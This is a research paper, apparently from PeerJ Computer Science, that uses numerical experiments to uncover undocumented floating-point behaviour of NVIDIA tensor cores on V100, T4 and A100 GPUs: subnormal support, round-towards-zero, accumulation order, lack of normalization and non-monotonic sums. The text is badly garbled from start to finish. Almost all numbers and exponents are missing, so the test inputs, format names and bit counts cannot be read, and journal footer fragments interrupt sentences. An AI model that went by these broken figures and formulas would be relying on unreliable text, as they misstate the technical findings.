abstract we explore the floating-point arithmetic implemented in the nvidia tensor cores, which are hardware accelerators for mixed-precision matrix multiplication available on the volta, turing, and ampere microarchitectures. using volta v100, turing t4, and ampere a100 graphics cards, we determine what precision is used for the intermediate results, whether subnormal numbers are supported, what rounding mode is used, in which order the operations underlying the matrix multiplication are performed, and whether partial sums are normalized. these aspects are not documented by nvidia, and we gain insight by running carefully designed numerical experiments on these hardware units. knowing the answers to these questions is important if one wishes to: (1) accurately simulate nvidia tensor cores on conventional hardware; (2) understand the differences between results produced by code that utilizes tensor cores and code that uses only ieee 754-compliant arithmetic operations; and (3) build custom hardware whose behavior matches that of nvidia tensor cores. as part of this work we provide a test suite that can be easily adapted to test newer versions of the nvidia tensor cores as well as similar accelerators from other vendors, as they become available. moreover, we identify a non-monotonicity issue affecting floating-point multi-operand adders if the intermediate results are not normalized after each step.
subjects algorithms and analysis of algorithms, computer architecture, scientific computing and simulation
keywords nvidia v100 gpu, nvidia t4 gpu, tensor core, dot product, matrix multiply-accumulate, floating-point arithmetic, half precision, binary16, ieee 754 arithmetic, nvidia a100 gpu
introduction
one hundred and sixteen of the computers in the november top500 list (https://www.top .org/lists/top / / /) are equipped with nvidia graphics processing units (gpus) based on the volta, turing, and ampere microarchitectures. a prominent feature of these gpus is the tensor cores, which are specialized hardware accelerators for performing a matrix multiply-accumulate operation. here, in particular, we focus on the tensor cores available on the nvidia v100 (volta microarchitecture), t4 (turing microarchitecture), and a100 (ampere microarchitecture) gpus, which implement the operation
$$\underbrace{D}_{\text{binary16 or binary32}} \;=\; \underbrace{C}_{\text{binary16 or binary32}} \;+\; \underbrace{A}_{\text{binary16}} \times \underbrace{B}_{\text{binary16}}, \qquad (1)$$
where a, b, c, and d are 4 × 4 matrices and "binaryxy" denotes the xy-bit format from the ieee 754 standard for floating-point arithmetic (ieee, ). the entries of a and b must be in binary16 format, whereas those of c and d can be either binary16 or binary32 floating-point numbers depending on the accumulation mode. the newer a100 (ampere microarchitecture) gpus support a wider range of matrix dimensions, as well as an additional floating-point format, as shown in table 1.
table 1: processing units or architectures equipped with mixed-precision matrix multiply-accumulate accelerators. the notation m × k × n refers to the matrix multiply-accumulate operation in (1), where c and d are m × n matrices, and a and b have size m × k and k × n, respectively.
device | matrix dimensions | input format | output format | reference
google tpu v2 | | bfloat16 | binary32 | google ( )
google tpu v3 | | bfloat16 | binary32 | google ( )
nvidia v100 | 4 × 4 × 4 | binary16 | binary32 | nvidia ( )
nvidia t4 | 4 × 4 × 4 | binary16 | binary32 | nvidia ( )
arm v8.6-a | | bfloat16 | binary32 | arm ltd ( )
nvidia a100 | | bfloat16 | binary32 | nvidia ( b)
nvidia a100 | | binary16 | binary32 | nvidia ( b)
nvidia a100 | | tensorfloat-32 | binary32 | nvidia ( b)
nvidia a100 | | binary64 | binary64 | nvidia ( b)
note: the binary16 and binary32 formats are sometimes referred to as fp16 and fp32, respectively.
the element $d_{ij}$ in (1) can be seen as the sum of $c_{ij}$ and the dot product between the ith row of a and the jth column of b, so that, for instance,
$$d_{11} = a_{11}b_{11} + a_{12}b_{21} + a_{13}b_{31} + a_{14}b_{41} + c_{11}. \qquad (2)$$
unfortunately, nvidia provides very little information about the numerical features of these units, and many questions naturally arise. the white paper that describes the volta microarchitecture (nvidia, , p. ) states that tensor cores operate on fp16 input data with fp32 accumulation. the fp16 multiply results in a full precision product that is then accumulated using fp32 addition with the other intermediate products for a 4 × 4 × 4 matrix multiply. the official documentation (nvidia, a) adds only a few more details: element-wise multiplication of matrix a and b is performed with at least single precision. when .ctype or .dtype is .f32, accumulation of the intermediate values is performed with at least single precision. when both .ctype and .dtype are specified as .f16, the accumulation is performed with at least half precision. the accumulation order, rounding and handling of subnormal inputs is unspecified.
from a numerical point of view, many essential aspects of tensor cores are not specified. this lack of key information makes it challenging to simulate tensor cores on conventional ieee 754-compliant systems and to build hardware that can reproduce their behavior. moreover, it can lead to unexpected differences between the results computed on nvidia devices with tensor cores enabled or disabled.
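the structure of (1) and (2) can be mimicked in software, which is also the kind of baseline the article compares against: binary16 operands whose products are formed exactly and then accumulated in binary32. the sketch below is only a plain c++ model of one element d11 computed this way (half-precision inputs are emulated with floats that are exactly representable in binary16); it is not the tensor core algorithm itself, whose ordering, rounding and normalization are precisely what the experiments try to uncover, and the input values are invented for the example.

```cpp
// Software model of one element of the block FMA in (2):
// d11 = a11*b11 + a12*b21 + a13*b31 + a14*b41 + c11,
// with products formed exactly and accumulation done in binary32.
// The inputs below are exactly representable in binary16, so any rounding
// error can come only from the four additions.
#include <cstdio>

int main() {
    // One row of A and one column of B (binary16-representable values).
    const float a[4] = {1.0f, 1.5f, 0.25f, 2.0f};
    const float b[4] = {0.5f, 2.0f, 4.0f, 0.125f};
    const float c11  = 1.0f;

    float d11 = c11;                 // start from the addend, as in (2)
    for (int k = 0; k < 4; ++k) {
        // Each product of two binary16 values fits exactly in binary32;
        // each addition may introduce one rounding error.
        d11 += a[k] * b[k];
    }
    std::printf("d11 = %.8e\n", d11);
    return 0;
}
```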
we now briefly recall some key aspects of ieee-compliant floating-point systems and the definitions and main properties of normalization and subnormal numbers, which are two important concepts in this work. a binary floating-point number x has the form (− )s × m × e − p, where s is the sign bit, p is the precision, m ∈ [ , p − ] is the integer significand, and e ∈ [emin, emax], with emin = − emax, is the integer exponent. in order for x to have a unique representation, the number system is normalized so that the most significant bit of m—the implicit bit in ieee parlance—is always set to if |x| ≥ emin. therefore, all floating-point numbers with m ≥ p − are normalized. numbers below the smallest normalized number emin in absolute value are called subnormal numbers, and are such that e = emin and < m < p − . subnormal numbers provide a means to represent values in the subnormal range, that is, between and the minimum normalized number. they have lower precision than normalized values (from p − bits to as low as bit), and require special treatment to be implemented in software and hardware. therefore it is not uncommon for hardware manufacturers not to support them, in order to avoid performance or chip area overheads. in implementing floating-point operations the result of an operation must be normalized (if possible) by shifting the significand left or right until it falls within the interval [ p − , p − ] and adjusting the exponent accordingly. more details can be found in muller et al. ( , sec. . ). the ieee standard for floating-point arithmetic provides a somewhat relaxed set of requirements for reduction operations such as dot product and multi-operand addition (ieee, , sec. . ): the order in which the partial sums should be evaluated is not prescribed, and the use of a higher-precision internal format is allowed. in particular, the standard does not specify: ( ) whether this internal format should be normalized, as it would be if the multi-operand addition were implemented using ieee elementary arithmetic operations, ( ) which rounding mode should be used, and ( ) when the rounding should happen. these loose requirements can potentially cause the results computed with a given multi-operand addition unit to be significantly different from those obtained using other hardware implementations or a software implementation based on ieee -compliant elementary arithmetic operations. with matrix multiplication being ubiquitous in artificial intelligence, accelerators for mixed-precision matrix multiply-accumulate operations are becoming widely available, as table shows. hardware vendors often design these units focusing on performance rather than numerical reliability, and this may lead to the implementation of unconventional, non-ieee-compliant arithmetics. some of the hardware units in table , for instance, use bfloat , a -bit format that allocates bits to the significand (including the implicit bit) fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and bits to the exponent and does not support subnormal numbers (intel corporation, ; intel corporation, ). it is worth noting that volta is the first nvidia microarchitecture supporting tensor cores—the older pascal gpus, such as the p , which are not reported in table , supported binary arithmetic but did not include tensor cores. 
the nvidia ampere a gpus introduce a new -bit format called tensorfloat- , which was designed to have the same dynamic range as binary ( bits) and the same precision as binary ( fraction bits, including the implicit bit) (nvidia, b). in order to better understand the differences between the results computed using different systems, it is necessary to develop techniques to probe the numerical features of these units. the situation is reminiscent of that before the widespread adoption of the ieee - standard, when different floating-point arithmetics had different properties. to address the issue, kahan ( ) developed a program called paranoia that analyzes and diagnoses a floating-point arithmetic, which was subsequently translated into c by karpinski ( ). we follow a similar route: using idiosyncrasies of floating-point arithmetic, we design tests to better understand the numerical behavior of tensor cores, extending the testing approach recently introduced by hickmann & bradford ( ). our aim is to explore the following questions. � are subnormal inputs supported or are they flushed to zero? can tensor cores produce subnormal numbers? � are the multiplications in ( ) exact and the additions performed in binary arithmetic, resulting in four rounding errors for each element of d? in what order are the four additions in ( ) performed? � what rounding mode is used in ( )? � is the result of each floating-point operation in ( ) normalized, or do tensor cores only normalize the final sum? what rounding mode is used for the normalization? the answers to these questions are of wide interest because these accelerators, despite being introduced to accelerate the training of deep neural networks (nvidia, , p. ), are increasingly being used in general-purpose scientific computing, where their fast low precision arithmetic can be exploited in mixed-precision algorithms (abdelfattah et al., ), for example in iterative refinement for linear systems (haidar et al., a, b, ). the results discussed here were produced by running our test suite, which is freely available on github (https://github.com/mfasi/tensor-cores-numerical-behavior). the file tc_test_numerics.cu can be compiled following the instructions in the readme.md file, so as to produce an executable that will run all the tests we describe in the following sections and produce a report. we run the test suite on an nvidia tesla v sxm gb gpu (volta microarchitecture), an nvidia tesla t gb gpu (turing microarchitecture), and an nvidia ampere a -pcia gb gpu. we used version . of the cuda library on the machines equipped with the volta and turing cards, and version . on the machines equipped with the a gpu, as gpus based on the ampere microarchitecture require at least version of the cuda library in order to utilize the fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/mfasi/tensor-cores-numerical-behavior http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ latest numerical features such as the tensorfloat- numerical type. some graphic cards designed for intensive graphic processing workloads such as video gaming, computer- aided design, or computer-generated imagery, also include tensor cores: all the gpus in the geforce and quadro rtx series are based on the turing microarchitecture, and those in the recently announced geforce series are based on the ampere microarchitecture. 
we do not consider this wealth of different graphic cards here, as our focus is on the nvidia hardware that is present in the supercomputers in the top list and targets scientific computing applications. we stress, however, that the ideas we employ are very general and can be exploited to understand the numerical features of any hardware accelerator based on operations of the form ( ). finally, we remark that the binary arithmetic implemented in the nvidia cuda cores is not fully ieee compliant, as round-to-nearest is the only rounding mode implemented for elementary arithmetic operations (nvidia, c)—we use this observation in “support for subnormal numbers”. previous work from a hardware perspective, instruction-level details, register configuration, and memory layout of the tensor cores in the nvidia volta (jia et al., b; yan, wang & chu, ) and turing (yan, wang & chu, ; jia et al., a) gpus have been extensively described. another study by basso, dos santos & rech ( ) explores the reliability of tensor cores in terms of rate of hardware errors in matrix multiplications. the main finding is that low-precision operations and usage of tensor cores increase the amount of correct data produced by the gpu, despite increasing the impact of numerical errors due to the use of lower-precision data. in order to quantify the accuracy of tensor cores, blanchard et al. ( ) provide a rounding error analysis of what they call a block fused multiply-add (fma), a generalization of the multiply-accumulate operation in ( ) in which the matrix sizes, the precisions of the arguments, and the internal precision of the accumulator are taken as parameters. markidis et al. ( ) discuss various aspects of tensor cores and propose a technique, called precision refinement, to enhance the accuracy of mixed-precision matrix multiplication. improving the accuracy of tensor-core-based matrix multiplications was further explored by mukunoki et al. ( ). none of the these sources, however, examines to what extent tensor cores conform to the ieee standard or investigates how tensor cores compare with a matrix multiply-accumulate operation based on dot products implemented in software. hickmann & bradford ( ) explore some details of the numerical behavior of tensor cores with the main goal of inferring the hardware-level design of these units. our work follows a similar approach and complements their findings by supplying further insights into the subject. we show that the additions in ( ) are performed starting from the operand that is largest in magnitude, that at least extra bits are used for carries, and that ( ) may be non-monotonic for certain sets of inputs. furthermore, we consider the second and third generation of the tensor cores, which equip the turing t and ampere a gpus, respectively, and conclude that their internal accumulator has an extra bottom bit fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ compared with the tensor cores on v gpus. finally we make our test suite freely available, in order to guarantee reproducibility and facilitate testing other matrix multiply- accumulate units, such as the third generation tensor cores in the latest nvidia a gpus (nvidia, b). results in this section we describe our testing methodology and give the results obtained on the three nvidia graphics cards we considered. table summarizes the tests we performed and indicates the subsections in which they are described. 
our methodology is to find test cases that demonstrate specific numerical behaviors and, by making the (quite reasonable) assumption that the hardware has a consistent behavior across the input space, conclude that the discovered features should be true for all possible inputs. nvidia volta tensor cores tensor cores can be accessed using the cublas library, or the native hardware assembly instructions hmma. (jia et al., a, b) and hmma. (yan, wang & chu, ; jia et al., a). in our experiments, we opted for the warp-level c++ function wmma::mma_sync(), which performs a × × matrix multiply-accumulate operation. this is the lowest level interface to access the tensor cores in the nvidia cuda programing environment. in order to use only a single tensor core, we set all but the top left × blocks to . we ensure that our experiments do use the tensor cores by running our test suite with the nvidia profiler nvprof, which shows the utilization levels of different hardware components on the gpu, and by observing that the assembly code produced by the nvcc compiler contains hmma instructions. at the software level, tensor cores can be used in either binary or binary mode, which defines the number format of d in ( ). table summary of the subsections of “results”. section devices used and description of tests performed on them nvidia volta tensor cores tests performed on the nvidia v (volta) gpu support for subnormal numbers support for subnormal numbers (on the inputs, outputs and the computation of subnormals from the normalized inputs) accuracy of the dot products accuracy of the inner products performed as part of matrix multiply-accumulate (accuracy of scalar multiplies, accuracy of addition, and number of rounding errors introduced) rounding modes in tensor core computations tests for determining what rounding modes are used in the inner products and the final rounding features of the accumulator tests that explore the number of extra bits in the alignment step of floating-point addition inside the inner product (extra bits at the bottom of the internal significand) a test to find out whether the normalization is performed only at the end or after each addition in the computation of the inner products a similar test for the normalization in subtraction tests for determining the number of extra bits for carries in floating-point addition (extra bits at the top of the internal significand) a test to check the monotonicity of the inner products nvidia turing tensor cores all tests from “nvidia volta tensor cores” rerun on the nvidia t (turing) gpu nvidia ampere tensor cores all tests from “nvidia volta tensor cores” rerun on the nvidia a (ampere) gpu fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the experiments in this section were run on an nvidia tesla v sxm gb (volta microarchitecture) gpu. support for subnormal numbers we start by investigating the support for subnormal numbers, as this knowledge will dictate what range of input values we are allowed to use in subsequent tests. table compares precision, exponent range, machine epsilon, and magnitude of smallest representable subnormal and normal number for various floating-point number formats, including those supported by the three generations of tensor cores. by looking at the data in the table, we can make two important observations. first, conversion from binary to binary does not result in subnormal numbers. 
second, the product of two binary numbers requires at most bits for the significand, bits for the exponent and one for the sign, and thus can be represented exactly in binary . as for tensor cores, there are multiple questions regarding the support of subnormal numbers. . can tensor cores take binary subnormal numbers as inputs for a and b in ( ) without flushing them to zero, use them in computation, and return binary or binary normal or subnormal results? . can tensor cores take binary subnormal numbers as inputs for c in ( ) without flushing them to zero, use them in computation, and return subnormal binary results? . can tensor cores compute subnormal numbers from normal numbers and return them? the first question can easily be addressed by considering ( ) and setting a = − , b = (arbitrarily chosen), and the remaining elements to zero. the tensor cores return the subnormal result a b = − in both binary and binary mode, thereby answering the first question in the affirmative. an analogous idea can be used to clarify the second point: setting c to the smallest positive binary subnormal − and all the elements of a and b to zero yields d = − , which confirms that the subnormal number c is not altered by the dot product in ( ). we note, however, that whether support for binary subnormals is needed is questionable. the absolute value of the smallest nonzero value that can be produced from the multiplication of two binary numbers is − , thus c would not contribute to table parameters of various floating-point formats: number of digits of precision including the implicit bit (p), boundary of the exponent range (emin and emax), machine epsilon (ε), and smallest positive representable normal (fmin) and subnormal (smin) numbers. the formats from the ieee standard (ieee, ) are binary , binary , and binary . binary bfloat tensorfloat- binary binary p emax , emin − − − − − , ɛ − − − − − fmin − − − − − smin − − − − − fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the sum if it were a binary subnormal: in binary arithmetic with round-to-nearest, one has that − + x > − only if x > − · − = − , which is normal in binary . for the third question, we can obtain subnormal numbers as outputs in several ways. for instance, we can set a to − , the smallest normal number in binary , and b to − , and confirm that tensor cores return the binary subnormal − in both binary and binary modes. another possibility is to set a = − , b = , and c = − − , which produces the subnormal binary number d = − . as mentioned above, it is not possible to obtain subnormal binary numbers from binary inputs in ( ). in summary, these experiments demonstrate that there is full support for subnormal inputs in tensor cores. one might wonder whether tensor cores natively support subnormals or some degree of software interaction is present. the nvidia profiler confirms that the experiments discussed in this section make use of the tensor cores, but we implemented an additional test to further reinforce the evidence that subnormals are supported in hardware. in “rounding modes in tensor core computations” we show that tensor cores use round-towards-zero. we can use the fact that cuda cores provide only round-to-nearest for binary computations to show that subnormals are in fact manipulated with tensor cores. in order to do so, we set a and a to , b to the binary subnormal − + − , b to and the other elements of a and b to . 
since the addition in ( ) is done in binary arithmetic, the smallest value that can be exactly added to b = is − . in this case, b ¼ � þ � ¼ � � will either be round down to , if round-towards-zero is being used, or rounded up to − , if the summation is carried out using the cuda cores, which support only round-to-nearest. this computation returned the value , meaning that b was rounded down—a further indication that subnormals are natively supported by tensor cores. accuracy of the dot products our second goal is to test the accuracy of the dot product ( ) with the tensor cores. the first step is to check that the products of two binary values are computed exactly, which implies that the products must be kept in some wider intermediate format and accumulated without being rounded back to binary . specifically we want to test that a ibi , for i = ,…, , is computed exactly. this can be achieved by ensuring that the four multiplications produce floating-point numbers that are not representable in binary and checking that these are preserved and returned as binary entries of d. in order to demonstrate this, we set the first row of a and the first column of b to − − and c to . the exact value of each partial product is ( − − ) · ( − − ) = − − + − , which, depending on the rounding mode, would be rounded to either − − or − − , if the products were stored in binary . as tensor cores produce the exact binary answer d = · ( − − + − ), we conclude that partial products are held exactly. another question is whether the precision of the -operand addition in ( ) changes in any way when binary is used to store the elements of the matrices c and d in ( ). the test is to set a = b = a = − − , b = − , and the remaining elements to . in this test, the first product a b = − − + − requires precision higher than binary to be represented, whereas the second evaluates to a b = − − − . the sum fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of these two products is a b + a b = − − + − , which is representable in binary but would not be computed exactly by a binary accumulator, since storing the first product requires higher precision. indeed we found that tensor cores output the exact value, confirming that the partial products are still held exactly even when c and d are in binary format. a third question concerns the number of rounding errors in the -operand adder that accumulates the partial products. the dot product in ( ) contains four additions, three to sum up the exact partial products and a fourth to add the binary argument c . our expectation is that the additions are done in binary rather than exactly, as indicated by nvidia ( , a). in order to confirm this, we can set the first row of a to , thereby reducing ( ) to d ¼ b þ b þ b þ b þ c ; ( ) and then run different cases with one of the addends in ( ) set to and the rest set to − . in this test, an exact addition would return + − , whereas inexact binary arithmetic would cause round-off errors when adding − to , causing the number to be returned. all permutations return d = , leading to the following conclusions. � in the worst case each element of d includes four rounding errors, which conforms to the block fma model used by blanchard et al. ( , sec. . ). � the partial products in ( ) are not accumulated in a fixed order, but always starting from the largest value in magnitude. 
this sorting is necessary in order to know which arguments require to be shifted right in the significand alignment step of a standard floating-point addition algorithm (muller et al., , sec. . ), (tenca, ), and is most likely done in hardware. this is in line with the literature on hardware dot products (kim & kim, ; tao et al., ; sohn & swartzlander, ; kaul et al., ), where either sorting or a search for the maximum exponent is performed. furthermore, this experiment demonstrates that none of the additions are performed before aligning the significands relative to the largest exponent: if evaluated before the arguments are shifted right relative to the largest magnitude arguments’ exponent (by having multiple alignment stages), any other sum would evaluate to − + − = − , a value that then could be added exactly to the total sum as the least significand bits would not be lost in the alignment. in summary, each entry of d in ( ) can have up to four rounding errors, and the - operand additions that compute each element are performed starting from the largest summand in absolute value. rounding modes in tensor core computations if binary mode is used, only the four additions in ( ) can be subject to rounding errors. the ieee standard defines four rounding modes for elementary arithmetic operations (ieee, , sec. . ): round-to-nearest with even-on-ties, round-towards-zero, round-towards-minus-infinity, and round-towards-plus-infinity. in this section we use the fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ notation defined by muller et al. ( , sec. . . ) and denote these four rounding operators by rn, rz, rd, and ru, respectively. as round-to-nearest is the default rounding mode in the ieee standard, we start by testing whether this is the rounding mode used by the tensor cores. this can be verified by setting any two partial products to values such that one of them would be rounded up only if round-to-nearest or round-towards-plus-infinity were used. if the result is rounded down we can conclude that the tensor cores implement either round-towards-zero or round-towards-minus-infinity, but neither round-to-nearest nor round-towards-plus- infinity (fig. b). one such test is to set in ( ) b = , b = − + − , and the remaining entries in the first column of b to . note that in binary arithmetic rn( +x) > if x > · − = − , whereas the smallest positive y such that rz( +y) > is · − = − . the choice b ¼ � � is such that x < b < y, thus rn(b +b ) = ru(b +b ) = + − while rz(b +b ) = rd(b +b ) = . running this experiment on tensor cores returns c = , suggesting that either round-towards-zero or round-towards-minus-infinity is used for the additions in ( ). we can discriminate between these two rounding modes by repeating the same experiment on the negative semiaxis (fig. a), which can be achieved by changing the sign of the nonzero elements in b. this experiment produces c = − , and assuming that the rounding mode does not depend on the input, we conclude that the additions in ( ) are performed in round-towards-zero. we note that this rounding mode is known to be the cheapest option to implement (santoro, bewick & horowitz, , sec. . ) and is usually chosen for that reason. when tensor cores are used in binary mode, the result computed in the format of the internal accumulator of the -operand adder has to be rounded to binary before being returned. 
in order to test the rounding mode used by this operation, we set a = a = − , b = − , b = − , and the rest of elements of a and b as well as c to . the exact result of the dot product in this case is − + − , which is not representable in binary , and therefore will cause rounding errors in the result. note that � þ � ¼ � � , therefore figure demonstration of the possible ieee rounding modes for different positions of the exact value x; x and x are the two floating-point numbers closest to x, and xm is the half-way point between them. the dotted arrows surrounding x show the direction in which various rounding modes would round it. (a) negative axis, x on the left of the middle point; (b) positive axis, x on the right of the middle point; (c) negative axis, x on the right of the middle point; (d) positive axis, x on the left of the middle point. full-size doi: . /peerj-cs. /fig- fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rn( − + − ) = ru( − + − ) = − while rz( − + − ) = rd( − + − ) = . the fact that tensor cores return − confirms that round-towards-zero is not used, thereby suggesting that this conversion is performed in software rather than inside the tensor cores, which use round-towards-zero as we have determined above. figures c and d show how round-towards-minus-infinity and round-towards-plus- infinity could alternatively be determined by choosing x such that |x| < |xm|. features of the accumulator we now discuss some tests that allowed to determine various features of the internal accumulator of the -operand adder calculating ( ). the quotes from nvidia that we provided in “introduction” indicate that the internal accumulation is done in binary format; here we show that the internal format used by the accumulator has higher precision and that the partial sums are not normalized. extra bits in the alignment of significands in order to compute the sum of two floating-point values, the floating-point adder matches the exponents of the two summands by shifting the significand of the number that has the smaller exponent to the right. in general this operation causes loss of information, as the least significant bits of the shifted significand are typically discarded, but it is customary to retain a few of these digits to guard the computation against numerical cancelation and to obtain correct rounding in round-to-nearest, round-towards-plus-infinity, and round-towards-minus-infinity. as tensor cores use truncation in the additions, we know that they do not require any such guard digits for rounding, and we can easily show that in fact they do not implement guard digits at all. if in ( ) we set b = and c = − + − , the tensor cores return d = − , which represents a relative error of ( − − − )/ − = . normalization in addition when two floating-point values are added, the significand of the result may become larger than (with m > p − , where m is an integer significand as in our definitions in “introduction”), in which case a normalization step (shifting the significand right by one place and increasing the exponent by one) is required (muller et al., , sec. . ). in an ieee -compliant arithmetic, the result of each partial sum in ( ) would be normalized, as floating-point adders always normalize the result in order to produce a normalized floating-point number. 
but tensor cores compute the whole expression ( ) in hardware rather than by means of ieee elementary arithmetic operations, and it is natural to ask whether each partial result in ( ) is normalized or only the final answer is. we can verify this by adding values chosen so to produce different results with and without normalization of the partial sums. in ( ) we set c = − − and the elements of the first column of b to − . recalling that the values are accumulated on the summand of largest magnitude, we start by examining what would happen if each partial result were normalized. the exact value of the partial sum s = c + − is , and the normalization step would shift the significand by one bit to the right. at this point the three remaining addends would be smaller than the least significant bit of the partial sum, thus adding them to s separately fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ would have no effect with round-towards-zero. if the partial results were not normalized, on the other hand, the sum of c and − would be held with one extra bit, and the remaining addends could be added to it. running this test on tensor cores shows that only the final result of the dot product is normalized. this has probably been done in order to simplify the implementation; a similar choice was made for example in the hardware accelerator for performing vector inner product described by kim & kim ( ). normalization in subtraction as the products in ( ) can be positive as well as negative, some of the partial sums can in fact be subtractions. the significand of the difference of two floating-point numbers may be smaller than , in which case the result has to be normalized by shifting the significand left and decreasing the exponents accordingly until the result becomes a normal number. we can show that tensor cores do not perform this kind of normalization as follows. if in ( ) we set c = − + − , and two of the elements of the first column of b to and − − , we have that d evaluates to if the partial sums are normalized. instead, running this experiment on tensor cores yields d = − , which can be explained as follows. when the sum is evaluated as ( + c ) − − , then the lack of guard digit implies that + c evaluates to − , and if the partial results were normalized the tensor cores would return − − − , which can be represented exactly in binary format’s precision. if, on the other hand, the sum were evaluated as (− − + ) + c , the first sum would return due to the lack of guard digit, and the lack of normalization would not have any effect in this case. we can conclude that the result of the subtraction is not normalized, as long as we assume that the summands in ( ) are accumulated on the largest in magnitude in a fixed order. extra bits for carry out another question concerns the number of extra bits required due to lack of normalization. if only the final result is normalized, then accumulating k addends requires ⌈log k⌉ bits for the carry-out bits (ercegovac & lang, , sec. . ), and the hardware for accumulating the values in ( ) would internally require ⌈log ⌉ = extra carry-out bits at the top of the significand. we can prove that the internal accumulator of the -operand adder in tensor cores has at least two extra bits as follows. in ( ) we take c = + − + − , which sets the two least significant bits of the significand to , and assign to the first column of b a permutation of the values , , , and − . 
we consider all four possible permutations of these values in the first column of b, as we assume that the addends apart from the largest in magnitude are not sorted. the main idea is to show that if is added to c three times, then the last two bits of c are not dropped as they would be if the accumulation were performed using ieee floating-point arithmetic, as the significand of c + > would have to be shifted by two places to the right in order to be normalized. then, when − is added at the end, the carry propagates into the third bit from the bottom and therefore is not lost in the final normalization step. if there are extra bits, then all the four possible orderings of the first column of b will return the exact result + − . running these tests on tensor cores, we found that all four combinations returned the fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ exact result, thereby proving that the significand of the internal accumulator has at least extra bits for carries. this technique cannot be used to incontrovertibly show that the -operand adder has a third extra bit for carries. on the one hand, all inputs to the multi-operand adder must have the most significant bit of the fraction (the implicit bit) set to , in order to produce carry that requires all three extra bits, on the other, the result of one of the four products of the form a kbk in ( ) must have the least significant bit of the fraction set to . as the product of two binary numbers can have at most significant digits, no combination of input can produce a partial product with the required characteristics. it is possible, however, to show the presence of the third bit if we assume that the alignment of the significand is always performed so that the most significant bit of the largest summand in the -operand adder occupies the left-most position. since we know that there are two extra bits and no normalization, we can show that there is also a third bit by showing that there is no overflow when each of the four additions in ( ) causes carry out. we can set, for example, c = + − + − + − , b = , b = + − , b = + − + − , and b = + − + − + − and observe that the tensor core returns d = . if only two extra bits were present, on the other hand, overflow would occur and the adder would incorrectly return d = . in summary, we can conclude that the internal significand of the tensor cores is most likely bits wide in volta cards and bits wide in turing and ampere cards (see “nvidia turing tensor cores” and “nvidia ampere tensor cores”). it is worth noting at this point that if ( ) there is no normalization, ( ) the additions in ( ) start with the largest value in magnitude, and ( ) all of the significands of the addends are shifted right relative to the exponent of the largest value in magnitude, then the order in which the remaining addends are accumulated will not impact the final result. in the test case above, by replacing one of the − by we can also confirm, using the methods developed in “rounding modes in tensor core computations”, that the rounding mode in the final normalization step (internal accumulator conversion to binary answer) is round-towards-zero. monotonicity of dot product the observation in the previous section raises one final question regarding the monotonicity of the sums in ( ). the accumulation is monotonic if in floating-point arithmetic the sum x + ⋯ + xn is no larger than y + ⋯ + yn if xi ≤ yi for all ≤ i ≤ n. 
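stated symbolically (a restatement of the definition just given, added for clarity): writing $\widehat{\mathrm{sum}}(x_1,\ldots,x_n)$ for the value returned by the unit under test,

$$
x_i \le y_i \ \text{ for all } 1 \le i \le n \quad \Longrightarrow \quad \widehat{\mathrm{sum}}(x_1,\ldots,x_n) \le \widehat{\mathrm{sum}}(y_1,\ldots,y_n).
$$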
we can show that the lack of normalization causes the dot product in tensor cores—and most likely in any other similar architectures in which partial sums are not normalized (kim & kim, ; tao et al., ; sohn & swartzlander, ; kaul et al., )—to behave non-monotonically. let us consider ( ) and set all the elements in the first column of b to − and then c to − − and in turn. when c = − − , the difference in exponents guarantees that the values in b are large enough to be added to c . this causes the result to become larger than , requiring a normalization that returns − − + · − = + − . on the other hand, when c = , none of the summands in ( ) is large enough to be added to c , as the elements in the first column of b are all zeroed out fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ during the significand alignment step of each addition. this happens because the exponent of is larger than that of − − . in summary we have d ¼ c þ � þ � þ � þ � ¼ þ � when c ¼ � � ; d ¼ c þ � þ � þ � þ � ¼ when c ¼ : these two sets of inputs demonstrate that tensor cores can produce non-monotonic behavior. nvidia turing tensor cores nvidia turing t gpus are equipped with the second generation of tensor cores, which adds an integer matrix multiply-accumulate operation. it is not documented whether the binary /binary tensor core arithmetic in turing chips differs from that in volta cards, therefore it is of interest to run the test suite we designed on one of the turing cards. we ran all the above experiments on an nvidia tesla t gb (turing microarchitecture) gpu, and noticed that some of the results were different from those obtained on a v gpu. we found that this is due to the presence of an additional extra bit of precision at the bottom of the significand of the internal accumulator of the -operand adder. this has an impact over several of the tests above: the operation + − + − , for example, can now be performed exactly because of the presence of the extra bit. the results obtained on the v gpu can be replicated by means of a suitable change of the constants that are chosen depending on the number of extra bits in the accumulator. for instance, in the test for the order of operations in “accuracy of the dot products”, the constant − should be replaced by − , which is the value of the next bit to the right. using this approach, we found that all the conclusions we drew about the tensor cores in v gpus remain valid for the second version of tensor cores in the t gpus, with the only exception of the extra bit at the bottom of the internal storage of the -operand adder. if we denote the fixed-point format with i integer bits and f fraction bits by {i.f}, the significand of the internal format of the -operand adder of a v gpu has format { . } (or { . } if extra bits for carries are present as discussed in “features of the accumulator”), whereas that of a t gpu has format { . } (or { . }). the final normalization and rounding produce a number whose significand has format { . }, which is the format of the significand of a binary floating-point number. nvidia ampere tensor cores as shown in table , the ampere microarchitecture offers four different variants of tensor core operations (input/output format): binary /binary , bfloat /binary , tensorfloat- /binary , and binary /binary . in this section we summarize, for each of these four configurations, the results obtained by running our test suite on the a gpus. 
